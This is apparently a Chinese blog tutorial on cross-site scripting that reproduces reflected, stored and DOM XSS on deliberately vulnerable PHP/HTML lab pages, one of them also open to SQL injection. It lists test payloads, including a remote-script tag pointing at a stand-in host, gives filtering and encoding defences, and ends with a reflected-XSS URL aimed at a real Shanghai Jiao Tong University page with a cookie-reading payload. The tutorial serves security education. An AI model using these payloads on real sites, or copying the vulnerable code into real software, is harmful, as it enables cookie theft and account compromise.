跨站脚本攻击(XSS)复现与防范、上海交通大学反射型与存储型xss案例

已于 2022-09-17 23:30:07 修改
阅读量7.6k 收藏 33
点赞数 10
分类专栏: 渗透测试 xss漏洞 文章标签: 1024程序员节 xss web安全
于 2021-10-24 12:39:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/120932300
版权

目录

xss漏洞介绍

XSS是什么

XSS漏洞原理

反射型XSS攻击复现

存储型XSS攻击复现

DOM型XSS攻击复现

常用的XSS测试语句

关于XSS的防御

交大案例

xss漏洞介绍

跨站脚本攻击,英文全称是Cross Site Scripting,为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS

XSS攻击,通常指的是攻击者通过“HTML注入”篡改网页,插入恶意脚本,代码注入的一种攻击手段,当其他用户浏览网页时就会受影响

常见的危害如窃取cookie,未授权操作,键盘记录,钓鱼等等

XSS是什么

那XSS到底是什么呢?举个例子,假设有一个页面,会把用户输入的参数直接输出至页面上,代码如下

<?php 
$input=$_GET["param"];
echo "<div>".$input."</div>";
?>

用户通过GET方式向param提交的参数会回显至页面上,若访问

http://127.0.0.1/1.php?param=ganyu

F12查看源码:

但是如果攻击者提交的是一段HTML代码呢?

http://127.0.0.1/1.php?param=<script>alert(/xss/)</script>

alert()方法用于显示带有一条指定消息和一个 OK 按钮的警告框

再次查看源码

可以看见,用户输入的script脚本已被写入至页面,alert(/xss/)在当前页面被执行

如果构造的payload不是<script>alert(/xss/)</script>,而是<script src=http://www.exp.com/exp.js></script>

真正的payload写在这个远程脚本exp.js中,避免直接在URL内写入大量javascript

以上例子就是典型的XSS第一种类型:反射型XSS

XSS漏洞原理

根据效果不同而分为三类:

反射型XSS

攻击方式:攻击者通过电子邮件等方式将包含的XSS代码恶意链接发送给目标用户,当用户访问链接时,服务器把带有XSS代码的数据发送给目标用户浏览器,浏览器解析这段恶意脚本,导致XSS漏洞,这种攻击方式也称为“非持久型XSS”

存储型XSS

攻击方式:攻击者在发帖过程中,将恶意脚本连同正常信息一起注入帖子的内容中,随着帖子被服务器存储下来,攻击脚本将被永久地存放在目标服务器的数据库中,具有很高的隐蔽性,当正常用户浏览这个被插入恶意脚本的帖子时,恶意脚本会在他们的浏览器中执行,这种攻击方式也称为“持久型XSS”

DOM型XSS

攻击方式:用户请求一个经过专门设计的URL,由攻击者提交,其中包含XSS代码,服务器的响应不会以任何方式包含攻击者的脚本,当用户浏览器处理这个响应时,DOM对象就会处理XSS代码,导致存在XSS漏洞

反射型XSS攻击复现

源码如下:

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
    <title>反射型XSS</title>
</head>
<body>
<center>
    <h6>反射型XSS靶场</h6>
    <form action="" method="get">
        <h6>请输入需要回显的字符串</h6>
        <input type="text" name="xss_input_value" value=""><br />
	<input type="submit">
</form>
<hr>
<?php
	if(isset($_GET['xss_input_value'])){
        	echo '<input type="text" value="'.$_GET['xss_input_value'].'">';
    }else{
        echo '<input type="text" value="输出中...">';
    }
?>
</center>
</body>
</html>

这段代码实现的功能是在表单内的输入框提交内容,单击提交按钮后,会回显至页面上,若访问http://127.0.0.1/1.html?xss_input_value=ganyu,ganyu将输出到页面上

但是如果访问的是http://127.0.0.1/1.html?xss_input_value=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E呢?

payload:"><script>alert(/xss/)</script>

F12查看源码,可以看到,输入的双引号闭合了value属性的双引号,并且重新插入一段HTML代码<script>alert(/xss/)</script>,如下所示

在反射型xss靶场中,通过GET方式提交参数xss_input_value的值,echo将会执行输出input标签,并将赋值给xss_input_value的值带入input的value中,当浏览器执行<input type="text" value=""><script>alert(/xss/)</script>">时,造成XSS漏洞,利用同样方式可以构造的payload如下

"><img src=1 οnerrοr=alert(/xss/)>,假设输入长度限制在20个字节,则可以利用事件来缩短所需要的字节数,如" οnclick=alert(1)//

存储型XSS攻击复现

存储型XSS页面实现的功能是获取用户输入的留言信息存储至数据库,并将留言信息输出到页面上

源码如下:

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
    <title>存储型XSS</title>
</head>
<body>
<center>
    <h6>存储型XSS靶场</h6>
	<h6>留言板</h6>
    <form action="" method="get">
		标题:<input type="text" name="title"><br />
        内容:<textarea name="content"></textarea><br />
	<input type="submit">
</form>
<hr>
<?php
	$con=mysqli_connect("localhost","root","passwd","xss");//本机地址,用户名,用户密码,数据库
	if(mysqli_connect_errno($con))
{
	echo "数据库连接错误" . mysqli_connect_error();
}
	if(isset($_POST['title'])){
		$result1=mysqli_query($con,"insert into xss(`title`,`content`) VALUES('".$_POST['title']."','".$_POST['content']."')");
}
	$result2=mysqli_query($con,"select * from xsstable");//查询表内所有内容
	echo "<table border='1'><tr><td>标题</tr><td>内容</td></tr>";
	while($row=mysqli_fetch_array($result2)){
echo "<tr><td>".$row['title'] . "</td><td>" . $row['content']."</td>";
}
echo "</table>";
?>
</center>
</body>
</html>

首先复现需要创建一个名为xss的数据库,新建一个xsstable表,两个字段名,title和content。

当用户插入一条标题为hello,内容为world时,数据库中数据如下所示

那如果攻击者插入的标题为<img src=1 οnerrοr=alert(/xss/)>呢?

再次查询

能看见,成功插入了数据。当浏览器访问的时候,浏览器会将标题输出至页面,页面执行HTML代码,导致弹窗。此时,这个XSS也称“持久性XSS”

DOM型XSS攻击复现

源码如下:

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
    <title>DOM型XSS</title>
    <script type="text/javascript">
        function tihuan(){
            document.getElementById("id1").innerHTML=document.getElementById("dom_input").value;
        }
    </script>
</head>
<body>
<center>
    <h6>DOM型XSS靶场</h6>
    <h6 id="id1">输入中...</h6>
    <form>
    	<input type="text" id="dom_input" value="输入"><br />
        <input type="button" value="替换" onclick="tihuan()"><br />
    </form>
    <hr>
</center>
</body>
</html>

单击“替换”会执行javascript的tihuan函数,tihuan函数为DOM操作,HTML的标签都是节点,通过HTML DOM,树中的所有节点均可通过javascript访问,如通过 document.getElementById获取ID为id1的节点,然后将节点id1的内容修改成id为dom_input中的值,当攻击者构造payload为,则造成XSS弹窗漏洞

常用的XSS测试语句

<script>alert(/xss/)</script>
</script><script>alert(/xss/)</script>
<img src=1 οnerrοr=alert(/xss/)>
<a herf=javascript:alert(/xss/)>
#' οnclick="alert(/xss/)">

关于XSS的防御

对用户提交的内容进行过滤,对url中的参数进行过滤,包括"","<",">","on*"等等,过滤掉会导致脚本执行的相关内容,对输入的内容进行过滤,可以分为黑名单过滤和白名单过滤。黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险。白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的。

对输出到页面的数据进行相应的编码转换,包括HTML实体编码,javascript编码等等

某交大案例:

反射型xss

https://mem.seiee.sjtu.edu.cn/meme/web/register/success?email=%3Cscript%3Ealert(document.cookie)%3C/script%3E

存储型xss

bbb07
关注
  • 10
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 14
    评论
专栏目录
web安全技术-实验七、跨站脚本攻击xss)(反射).doc
08-20
web安全技术-实验七、跨站脚本攻击xss)(反射
详解XSS漏洞及反射XSS漏洞
MachineGunJoe666
09-16 368
跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,将其注入到Web页面中,并在访问该页面的用户浏览器中执行该脚本代码,从而窃取用户敏感信息、篡改页面内容、操纵页面行为等。XSS漏洞一般分为反射XSS存储XSS和DOM-Based XSS三种类反射XSS漏洞是Web应用程序中常见的安全漏洞,攻击者可利用该漏洞注入恶意代码,窃取用户敏感信息、篡改页面内容、操纵页面行为等。
XSS跨站脚本攻击漏洞修复技巧
最新发布
2401_84208172的博客
05-18 859
跨站脚本攻击,又称XSS代码攻击,也是一种常见的脚本注入攻击。例如在下面的界面上,很多输入框是可以随意输入内容的,特别是一些文本编辑框里面,可以输入例如这样的内容,如果在一些首页出现很多这样内容,而又不经过处理,那么页面就不断的弹框,更有甚者,在里面执行一个无限循环的脚本函数,直到页面耗尽资源为止,类似这样的攻击都是很常见的,所以我们如果是在外网或者很有危险的网络上发布程序,一般都需要对这些问题进行修复。
反射XSS跨站脚本攻击和防御
认知 行动 坚持
07-05 6057
在前面的文章中,讲述了最好懂的存储XSS攻击和防御,本文来聊聊反射XSS,所谓反射,就像镜子一样,一束光发过去,立即弹回来。这里依赖于微博服务器存在反射XSS漏洞。那么,坏人C为什么不自己搭建一个反射服务器进行反射呢? 这是个好问题。以js获取cookie为例,如果坏人C自己搭建反射服务器,那么很显然document.cookie就无法获取好人A的微博cookie,所以,还是要用微博服务器做反射,这样才能获取好人A的微博cookie,从而进行攻击。
XSS漏洞
zhoutong2323的博客
04-19 1259
XSS漏洞(Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时,攻击者就可以利用该漏洞来执行任意的代码,例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。
XSS跨站脚本攻击详解以及复现gallerycms字符长度限制短域名绕过
qq_31088019的博客
07-25 1674
xss详解以及利用短字符缩短字符长度进行短域名绕过
反射XSS实验(1)
m0_63306943的博客
11-08 788
安全知识分享
XSS跨站脚本---类介绍与展示
04-29
XSS跨站脚本PPT--Web安全技术主要包括如下三大类: Web服务器安全技术 Web应用服务安全技术 Web浏览器安全技术
xss跨站脚本攻击与预防
11-04
XSS攻击的类主要包括三种:反射XSS存储XSS和DOMXSS反射XSS是通过诱使用户点击含有恶意脚本的链接,然后在当前页面上执行;存储XSS则更为严重,因为恶意脚本被存储在服务器上,任何访问该页面的用户...
奇安信安全扫描漏洞解决路径遍历和存储xss反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
XSS跨站脚本gj剖析与防御
05-18
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息、操纵用户界面或进行其他有害操作。这种攻击通常发生在Web应用程序中,因为它们未能...
Domxss的理解和反射xss实战操作
NLost
06-18 944
Domxss类似于反射xss,但是不同点在于DOM XSS 主要是由客户端的js脚本通过 DOM 动态地输出数据到页面上,它不依赖于提交数据到服务器,而是从客户端获得DOM中的数据在本地执行。
3-2从基础的反射XSS开始
山兔的博客
04-13 1257
我们通过pikachu反射xss给大家做一个演示 根据我们之前讲的思路,我们走一遍,首先,我们要确认下这个页面上是不是存在xss漏洞,我们首先可以在这个对应的输入点,去输入一些特殊的字符,比如说单引号、双引号、左右尖括号、七个七,这样的一个payload '"<>7777 这样输入的目的,就是测试,我们的输入在提交的时候,会不会被过滤掉,因为他有特殊字符,然后去验证这个输入,最终会不会被输出,输出的时候,有没有被处理,是这么个目的,然后我们点一下提交 根据我们刚刚的输入,看一下页面的
XSS注入——反射XSS
wwwwyyyrre的博客
06-15 2332
所以就可以利用这个函数来构造payload,也是最简单的xss脚本语言:这样就可以绕过了 没有任何的限制 就是一个简单的反射xss注入等明天搭一个本地的靶场来做xss-labs我认为不是很难,反射xss
复现awvs——XSS(反射)漏洞
记录并分享学习安全的知识点..
12-29 2891
1.首先通过awvs对网站进行扫描如下: 2. 判断为xss反射漏洞,然后打开目标网站,首先先找到变量ref 3.可以看出被隐藏了,将type值改为text文本框,进行复现
SQL注入和XSS攻击
neverSaynever_的博客
02-20 1621
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
漏洞篇之DOMxss
weixin_46446401的博客
03-03 8225
介绍了domxss的原理和特点,并讲解了pikachu这个靶场的例子
存储跨站脚本漏洞,过滤特殊字符, SpringMvc防范XSS攻击。
weixin_42267411的博客
09-26 2079
公司最近在搞测试,请的第三方测试机构。。。一顿操作猛如虎。。。 记录一次现在很多项目都容易忽略的存储跨站脚本漏洞处理,就是XSS攻击漏洞,只要有用户输入的地方,就可能会有XSS漏洞,比如我们在留言板,或者发布文章的地方输入: <script>alert(1);</script> 当这条数据被存储到数据库,并且在页面上再次显示的时候,就会弹窗输出“1”,这只是简单的sc...
跨站脚本攻击XSS
06-08
跨站脚本攻击(Cross-Site Scripting,简称 XSS)是一种常见的网络安全漏洞,攻击者利用输入输出不当的漏洞,将恶意脚本注入到网页中,使得用户在访问网页时受到攻击。 XSS 攻击通常分为三种类反射存储和 DOM 反射 XSS 攻击是通过构造恶意的 URL,将脚本注入到网页中,当用户访问此 URL 时,就会触发攻击。这种攻击方式比较简单,但需要诱骗用户点击恶意链接才能实施攻击。 存储 XSS 攻击是将恶意脚本存储在服务器端,当用户访问包含该脚本的页面时,就会触发攻击。这种攻击方式比较隐蔽,攻击者可以将恶意脚本存储在常用的网站或论坛上,等待用户访问并触发攻击。 DOM XSS 攻击是将恶意脚本注入到网页的 DOM 中,当用户浏览网页时,就会触发攻击。这种攻击方式比较难以防范,因为它不需要向服务器发送请求,而是直接在用户的浏览器中执行恶意脚本。 为了防止 XSS 攻击,开发人员可以采取以下措施: 1. 对输入进行过滤和校验,禁止用户输入包含脚本的内容。 2. 对输出进行转义,将 HTML、CSS、JavaScript 等特殊字符转义为实体字符。 3. 使用 CSP(Content Security Policy)控制网页中可以加载的资源,限制页面中的脚本执行和数据传输。 4. 使用 HttpOnly 属性设置 cookie,禁止 JavaScript 访问 cookie,防止攻击者窃取用户的凭证。 5. 及时修补漏洞,避免攻击者利用已知漏洞进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值